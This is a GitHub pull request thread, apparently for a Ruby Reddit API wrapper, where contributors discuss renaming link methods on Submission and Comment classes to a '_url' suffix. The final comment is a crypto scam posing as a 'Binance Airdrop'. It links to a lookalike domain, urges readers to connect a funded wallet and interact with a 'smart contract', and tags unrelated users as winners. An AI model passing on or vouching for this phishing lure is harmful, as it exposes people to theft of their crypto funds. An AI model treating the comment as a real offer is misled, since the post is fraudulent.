Added Submission::link and Comment::comment_link

khalilfazal opened the pull request:
The method names are confusing.
Why does Submission::permalink return a relative path instead of an absolute path?
Why does Comment::link return the link to the submission instead of a link to the comment itself?

kha-faz committed:
Added Submission::link

kha-faz committed:
Added Comment::comment_link

the method names are confusing. Why does Comment::link return the link to the submission instead?

kha-faz committed:
Merge pull request #1 from khalilfazal/patch-2

Added Comment::comment_link

kha-faz committed:
Update comment.rb

removed whitespace

kha-faz committed:
Update submission.rb

removed whitespace

khalilfazal commented:
So I don't think it's my fault that travis can't build. It is having trouble installing jruby.

StephanMeijer commented:
Reddit calls a submission also a link. Please suffix your functions with `_url` instead of `_link`.

kha-faz committed:
Update comment.rb

Suggestion from Stephan Meijer:

Reddit calls a submission also a link. Please suffix your functions with _url instead of _link.

StephanMeijer commented:
Maybe change to other link-function to url as well?

kha-faz committed:
Update submission.rb

StephanMeijer commented:
Thank you. I will merge it into my fork (https://github.com/StephanMeijer/redd/)

katsavav commented:
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @cfliao, @harshit-raj, @n1to-bit, @washujiang, @alfaindia, @kilianmh, @marcofavorito
